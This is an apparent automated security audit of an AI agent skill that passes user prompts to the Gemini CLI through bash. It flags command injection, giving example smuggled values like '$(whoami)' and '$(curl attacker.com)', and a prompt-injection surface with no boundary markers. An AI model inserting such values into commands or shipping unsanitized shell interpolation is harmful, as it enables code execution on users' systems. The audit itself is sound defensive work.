gemini-query

Audited by Gen Agent Trust Hub on Mar 28, 2026

Risk Level: MEDIUM
Findings: COMMAND_EXECUTION, PROMPT_INJECTION
Full Analysis
  • [COMMAND_EXECUTION]: The skill executes a Bash command that incorporates user-supplied arguments without sufficient sanitization.
      ◦ Evidence: The line result=$(gemini "$ARGUMENTS" --output-format json 2>&1) in SKILL.md directly embeds the $ARGUMENTS variable.
      ◦ Risk: In a Bash environment, double quotes do not prevent command substitution. An attacker providing a prompt such as $(whoami) or $(curl attacker.com) would cause the shell to execute those commands before passing the result to the gemini CLI tool.
  • [PROMPT_INJECTION]: The skill provides an interface for passing untrusted data to a downstream LLM (Gemini CLI), creating a surface for indirect prompt injection.
      ◦ Ingestion points: The user-provided <prompt> is captured via the $ARGUMENTS variable in SKILL.md.
      ◦ Boundary markers: Absent. The user input is passed directly as a positional argument, without delimiters or instructions telling the downstream tool to ignore embedded commands.
      ◦ Capability inventory: The skill possesses the Bash tool capability, which is used to execute the query and to parse the output with jq.
      ◦ Sanitization: Absent. There is no escaping or validation of the user input before it is used in the shell command or sent to the model.
Audit Metadata
  • Risk Level: MEDIUM
  • Analyzed: Mar 28, 2026, 05:24 AM